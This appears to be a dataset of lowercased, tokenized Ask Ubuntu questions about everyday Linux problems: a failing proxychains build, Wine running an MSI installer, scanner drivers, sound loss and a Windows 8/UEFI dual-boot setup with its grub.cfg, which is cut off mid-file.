283526	installing proxychains . help needed !	ok so i am new to linux . i am trying to install proxychains but im sure it has dependencies that i do not have on my system can somebody look at the following script and tell me the list of packages i need to install using apt-get . pr0jectzer0 @ pr0jectzer0-optiplex-gx620 : ~ $ ls desktop documents downloads help music pictures public templates videos pr0jectzer0 @ pr0jectzer0-optiplex-gx620 : ~ $ cd desktop pr0jectzer0 @ pr0jectzer0-optiplex-gx620 : ~/desktop $ ls programming proxychains-3.1.tar.gz torbrowser_en-us.app proxychains-3.1 tor tor-browser-gnu-linux-i686-2.3.25-6-dev-en-us.tar.gz pr0jectzer0 @ pr0jectzer0-optiplex-gx620 : ~/desktop $ cd proxychains-3.1 pr0jectzer0 @ pr0jectzer0-optiplex-gx620 : ~/desktop/proxychains-3.1 $ ./configure checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking target system type ... i686-pc-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking whether make sets $ ( make ) ... yes checking for working aclocal-1.4 ... missing checking for working autoconf ... missing checking for working automake-1.4 ... missing checking for working autoheader ... missing checking for working makeinfo ... missing checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept ansi c ... none needed checking for a sed that does not truncate output ... /bin/sed checking for egrep ... grep -e checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for /usr/bin/ld option to reload object files ... -r checking for bsd-compatible nm ... /usr/bin/nm -b checking whether ln -s works ... yes checking how to recognise dependent libraries ... pass_all checking how to run the c preprocessor ... gcc -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking dlfcn.h usability ... yes checking dlfcn.h presence ... yes checking for dlfcn.h ... yes checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking how to run the c++ preprocessor ... g++ -e checking for g77 ... no checking for f77 ... no checking for xlf ... no checking for frt ... no checking for pgf77 ... no checking for fort77 ... no checking for fl32 ... no checking for af77 ... no checking for f90 ... no checking for xlf90 ... no checking for pgf90 ... no checking for epcf90 ... no checking for f95 ... no checking for fort ... no checking for xlf95 ... no checking for ifc ... no checking for efc ... no checking for pgf95 ... no checking for lf95 ... no checking for gfortran ... no checking whether we are using the gnu fortran 77 compiler ... no checking whether accepts -g ... no checking the maximum length of command line arguments ... 32768 checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for objdir ... .libs checking for ar ... ar checking for ranlib ... ranlib checking for strip ... strip checking for correct ltmain.sh version ... yes checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic checking if gcc pic flag -fpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes configure : creating libtool appending configuration tag `` cxx '' to libtool checking for ld used by g++ ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking whether the g++ linker ( /usr/bin/ld ) supports shared libraries ... yes checking for g++ option to produce pic ... -fpic checking if g++ pic flag -fpic works ... yes checking if g++ static flag -static works ... yes checking if g++ supports -c -o file.o ... yes checking whether the g++ linker ( /usr/bin/ld ) supports shared libraries ... yes checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate appending configuration tag `` f77 '' to libtool configure : creating ./config.status config.status : creating makefile config.status : creating proxychains/makefile config.status : creating proxychains/docs/makefile config.status : creating proxychains/docs/en/makefile config.status : creating config.h config.status : config.h is unchanged config.status : executing default-1 commands pr0jectzer0 @ pr0jectzer0-optiplex-gx620 : ~/desktop/proxychains-3.1 $ make make all-recursive make [ 1 ] : entering directory `/home/pr0jectzer0/desktop/proxychains-3.1' making all in proxychains make [ 2 ] : entering directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains' making all in docs make [ 3 ] : entering directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains/docs' making all in en make [ 4 ] : entering directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains/docs/en' make [ 4 ] : nothing to be done for `all ' . make [ 4 ] : leaving directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains/docs/en' make [ 4 ] : entering directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains/docs' make [ 4 ] : nothing to be done for `all-am ' . make [ 4 ] : leaving directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains/docs' make [ 3 ] : leaving directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains/docs' make [ 3 ] : entering directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains' /bin/bash ../libtool -- mode=compile gcc -dhave_config_h -i . -i . -i.. -g -o2 -c libproxychains.c gcc -dhave_config_h -i . -i . -i.. -g -o2 -wp , -md , .deps/libproxychains.pp -c libproxychains.c -fpic -dpic -o .libs/libproxychains.o libproxychains.c:291:5 : error : conflicting types for 'getnameinfo' /usr/include/netdb.h:679:12 : note : previous declaration of 'getnameinfo ' was here make [ 3 ] : *** [ libproxychains.lo ] error 1 make [ 3 ] : leaving directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/pr0jectzer0/desktop/proxychains-3.1/proxychains' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/pr0jectzer0/desktop/proxychains-3.1' make : *** [ all-recursive-am ] error 2 pr0jectzer0 @ pr0jectzer0-optiplex-gx620 : ~/desktop/proxychains-3.1 $ as you can see i have not made it to $ sudo make install please help im getting stressed lol .
283528	targus usb 3.0 docking station support	i am planning to purchase a targus 3.0 docking station , does anybody have experience with it on ubuntu . will the display work ? http : //www.targus.com/uk/categorysearch.asp ? searchedterms=usb+docking+station & action.x=0 & action.y=0
283529	installing scanner driver	i want to scan with my epson stylus office bx535wd in ubuntu 12.04 via usb cable but is does n't . now i got on this site but there are so many files ? which ones should i download and install in order to scan ? epson support
283535	how do i run in wine a program installed from an msi ?	i have installed a .msi file with wine , by right-clicking on it and selecting `` run with wine '' . wine has apparently succesfully installed the application : now how am i supposed to run it ? i have typed the name of the program in ubuntu 's launcher , and an item appears with that name and wine 's icon , so i 've tried to run that , but i get two popups one after the other with the following error messages : - invalid parameter - there is no window program configured to run this file the program is called `` inssider '' and i downloaded it from : http : //files.metageek.net/downloads/inssider-installer-2.1.5.1393.msi update : $ wine start `` c : \program files\metageek\inssider\inssider.exe '' fixme : exec : shell_execute flags ignored : 0x00000100 teo @ xxx : ~ $ fixme : mscoree : configfilehandler_startelement unknown element l '' configsections '' in state 1 fixme : mscoree : configfilehandler_startelement unknown element l '' sectiongroup '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' section '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' section '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' usersettings '' in state 1 fixme : mscoree : configfilehandler_startelement unknown element l '' inssider.properties.settings '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' metascanner.properties.settings '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' setting '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' value '' in state 3 wine : install mono for windows to run .net 2.0 applications .
283539	installing ubuntu from local mirror ( on filesystem ) with current raring-server-amd64.iso	i am in environment , where no internet connection is available at all . however , i 've mirrored a part of raring repository to the local filesystem ( 75gb in total ) , hoping , that it is still possible to grab packages for installation from there with a mirror lines looking like : deb-amd64 file : /mnt/spool/apt-mirror/ubuntu raring main restricted but inside of the expert installer , it looks like it 's impossible to set everything up like this ... at least it looks like that . everything i can select from is http and ftp . any suggestions are appreciated .
283540	why wont ubuntu desktop shut down ?	i installed ubuntu 12.04.2 lts via usb drive -- everything functioning okay -- and downloaded 150+ updates . i used the shut down command , and the computer would n't turn off . the computer is an acer aspire one netbook . i needed to install a driver for the canon printer , and a cd/dvd writing programme . i have tried the on/off switch , esc , ctrl+alt+delete .
283545	how to format ubuntu bootable usb ?	i am new in ubuntu . first i installed ubuntu 12.10 on my usb stick which is of 16 gb . so , it installed with 2 partitions of 9 and 7 gb . now i want to format that usb . but when i try it to format , only ext4 one formatted it and not the partition which is swap memory . now on other os my usb shows only 8.5 gb of .
283548	how do i install zopectl ?	while trying to install zopectl and zope testcase i am getting this error : oomsys @ oomsysmob-6 : ~/zopectl $ sudo apt-get install zopectl reading package lists ... done building dependency tree reading state information ... done e : unable to locate package zopectl i put the tar file in my home directory . but i do n't know why i am getting this error . can anyone tell me the reason ?
283549	how do i stop ubuntu 12.10 heating up so much ?	i am dual booting windows 8 with ubuntu 12.10 . when i use windows 8 , it hardly ever heats up , while in ubuntu it heats up very quickly . i am using a netbook and i do not want to give up at ubuntu , but also i do not want to upgrade any hardware . the netbook is a acer aspire one d257 , it has a intel atom n570 , igb ram and 6 cell lion battery . i do not know what graphics card it has .
283557	strange popup - keyboard stops working and mouse ca n't be held	i just installed ubuntu 12.10 ( i formatted my old lucid lynx drive by accident ) . it 's been working great , but every now and then ( especially when i leave ) this pops up , lasts for about 5 seconds , fades away , and a new one appears . i am using a dell studio 1737 , a usb hdd for ubuntu , a usb mouse and a usb keyboard . it 's always plugged in , too , if that helps . i 've googled around , and i 've seen a post that lead me to believe that my problem is related to the media hotkeys on the built-in keyboard . they look like this . it seems that a log-out can fix it . sometimes i have to restart , or shutdown and hard boot . my friend thinks that it 's a driver problem . i 've had good experiences with ubuntu , left for windows because of gaming , and i came back because of steam . i 'm very disappointed in the downgrade from lucid lynx to quantal quetzal . i hope someone can make this an upgrade for me .
283559	how can i run disk utility in terminal via a comand line ?	first of all , i must say that i have successfully used disk utility in the past and thus i could rename my partitions . but yesterday , i saw that my partitions are not mounted , so i used storage device manager to make them to automatically mount at start up . that was a success also but i saw that the partitions are labelled as sda1 and sda7 not as they were initially . so i wonted to open again disk utility to rename them . the problem is that , no matter how many times i try to open the application it just does't start at all ! i do n't know why it is doing this , as i have already told , i could use it in the past very well . i do n't know if this `` lack of reaction '' of the application is the result of the actions i described before , or it is something else . but i 'm thinking of trying to start disk utility in terminal . maybe i 'll force it to run and solve the labelling problem . do you have any ideas ?
283561	no title bar , window bored or unity launcher in 12.10 after xrandr	-hey guys , need some serious help . yesterday i was playing around with xrandr to try to get an hdmi tv to work properly without having over scan/ under scan as i have an intel graphic chip and could not use the control centre . all was fine , but after booting into ubuntu today , after the login screen all i see is my desktop background and my mouse , no top title bar , or launcher . i can open up terminal using ctrl alt t and can run programs through there but need to get this fixed ! any suggestions as i do n't know where i 've gone wring . thanks
283564	unexpectedly lost speaker output . headphone output works fine	yesterday when i opened my laptop i noticed that i no longer had sound from the built-in speakers . i carefully checked settings in sound preferences , and then dropped to shell and looked in alsamixer . nothing is showing muted or 0/no volume . everything is on and set to max volume . the profile is analog stereo duplex , the default . sound works fine when using headphones . i 'm runnning out of ideas and even updated my kernel to 3.8.8 in hopes that would shake this loose . no dice there ( kernel works nice btw ) . here are my current specs : release=14 codename=nadia edition= '' mate 64-bit '' description= '' linux mint 14 nadia '' desktop=mate toolkit=gtk alsamixer screengrab : i do n't want to load up my question with irrelevant conf files - if i need to post more here please indicate in a comment .
283565	sync network-drive ( windows home server 2011 )	i 'm running a whs 2011 nas in my network and i 'd like to auto-sync several folders ( e.g . music ) every once in a while . to do so , i used to use `` create synconicity '' on windows . on ubuntu 12.10 i 'm unable to do so . neither grsync nor freefilesync enable me to select the network-drive . the drive/nas is mounted via nautilus and displayed under `` network '' , yet this tab does n't appear in grsync/freefilesync . has anyone a suggestion for me ? thanks in advance !
283567	txt file and linebreaks	i used antiword > filename.txt to convert a .doc word document to a txt file . then i edited the file in nano ( also tried vim ) and when the document is viewed in libre office and gvim or even text edit the line breaks are in the wrong place . the bit that was originally a .doc kept the correct line breaks but the bit i added did not . it displays correctly in the terminal editors but not in the gui a link to an example : b was written in libre office c was written in nano . http : //pastebin.com/jshwmiih why is that so ? is there a way to fix it ?
283574	windows 8 does n't allow ubuntu start-up	scenario recently i build up my own desktop and decided to install as first os windows 8 ( why did i do that ... ) as always i have both , ubuntu and windows , i though that installing windows first would be better to check if my video card was working properly as drivers works better in windows . problem the problem is that when i installed ubuntu after restarting the pc i wo n't be prompted to choose an os , it simply starts windows 8 . then i read about windows 8 installation and found out that it uses uefi boot as there is a partition created by windows that is efi . then i tried to install ubuntu efi although i got the very same situation . after that i did a last try making things manually by selecting the partition that windows created as efi partition , although the installation could n't proceed because it did n't identified the efi partition as an efi partition . what i want i wonder if i delete the partition that windows created as efi and let ubuntu create it 's own efi in the place will things work ? but if that is n't possible i do n't want windows 8 anymore in my pc , i will stick with 7 and ubuntu , but as i do n't know a lot about uefi stuff i am wondering if i just make a backup partition for my important files in ntfs system and delete all the rest and then install ubuntu and after windows 7 it will work . because i do n't know if windows 8 configurations into the uefi bios will remain after deleting it from the hdd and it will prevent me from installing other os'es and then i will be with no computer at all . in addition i would like to have ubuntu and windows 7 installed both as efi systems if possible cause as far as i know it improves security ( correct me if i am wrong ) and my motherboard does n't support secure boot it has any option about that in the bios and i ran confirm-securebootuefi command in windows that returned that my system does n't support secure boot . my pc specs corsair vengeance lp 8gb ( 2 x 4gb ) ddr3 1333 ( pc3 10666 ) ( cml8gx3m2a1333c9 ) gigabyte radeon hd 7970 3gb 384-bit gddr5 pci express 3.0 x16 ( gv-r797oc-3gd ) intel core i5-3570 ivy bridge 3.4ghz ( 3.8ghz turbo ) lga 1155 77w quad-core ( bx80637i53570 ) gigabyte ga-b75m-d3h dual-uefi lga 1155 intel b75 hdmi sata 6gb/s usb 3.0 micro atx ( ga-b75m-d3h ) seagate barracuda 1tb 7200 rpm 32mb cache sata 6.0gb/s 3.5 '' ( st31000524as ) additional info as suggested by user rod smith i ran boot info script in the live usb of raring daily build , the content of the file results.txt is here : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.04 boot files : /boot/grub/grub.cfg /etc/fstab sda4 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.04 2011-04-18 boot sector info : syslinux looks at sector 1628296 of /dev/sdb1 for its second stage . syslinux is installed in the directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /syslinux/syslinux.cfg /efi/boot/grubx64.efi /ldlinux.sys ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 718,847 716,800 7 ntfs / exfat / hpfs /dev/sda2 718,848 921,599,999 920,881,152 7 ntfs / exfat / hpfs /dev/sda3 921,600,000 1,945,693,749 1,024,093,750 83 linux /dev/sda4 1,945,694,208 1,953,523,711 7,829,504 82 linux swap / solaris drive : sdb _____________________________________________________________________ disk /dev/sdb : 4051 mb , 4051697152 bytes 125 heads , 62 sectors/track , 1021 cylinders , total 7913471 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 62 7,912,749 7,912,688 b w95 fat32 '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 4664c9eb64c9de35 ntfs reservado pelo sistema /dev/sda2 8a46d14c46d13a21 ntfs /dev/sda3 3372315d-d1df-4670-bcbb-4a4ab5548b09 ext4 /dev/sda4 d5f3ad90-fa34-4a62-9adc-efc3fdd3bfce swap /dev/sdb1 b656-e464 vfat mylinuxlive ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sda2 /media/ubuntu/8a46d14c46d13a21 fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb1 /cdrom vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) =========================== sda3/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 3372315d-d1df-4670-bcbb-4a4ab5548b09 else search -- no-floppy -- fs-uuid -- set=root 3372315d-d1df-4670-bcbb-4a4ab5548b09 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=pt_br insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-3372315d-d1df-4670-bcbb-4a4ab5548b09 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 3372315d-d1df-4670-bcbb-4a4ab5548b09 else search -- no-floppy -- fs-uuid -- set=root 3372315d-d1df-4670-bcbb-4a4ab5548b09 fi linux /boot/vmlinuz-3.8.0-19-generic root=uuid=3372315d-d1df-4670-bcbb-4a4ab5548b09 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-19-generic } submenu 'opções avançadas para ubuntu ' $ menuentry_id_option 'gnulinux-advanced-3372315d-d1df-4670-bcbb-4a4ab5548b09 ' { menuentry 'ubuntu , com linux 3.8.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-advanced-3372315d-d1df-4670-bcbb-4a4ab5548b09 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos3 -- hint-efi=hd0 , msdos3 -- hint-baremetal=ahci0 , msdos3 3372315d-d1df-4670-bcbb-4a4ab5548b09 else search -- no-floppy -- fs-uuid -- set=root 3372315d-d1df-4670-bcbb-4a4ab5548b09 fi echo 'carregando linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=3372315d-d1df-4670-bcbb-4a4ab5548b09 ro quiet splash $ vt_handoff echo 'carregando ramdisk inicial ... ' initrd /boot/initrd.img-3.8.0-19-generic } menuentry 'ubuntu , com linux 3.8.0-19-generic ( modo de recuperação ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-recovery-3372315d-d1df-4670-bcbb-4a4ab5548b09 ' { recordfail load_video insmod gzio insmod part_msdos 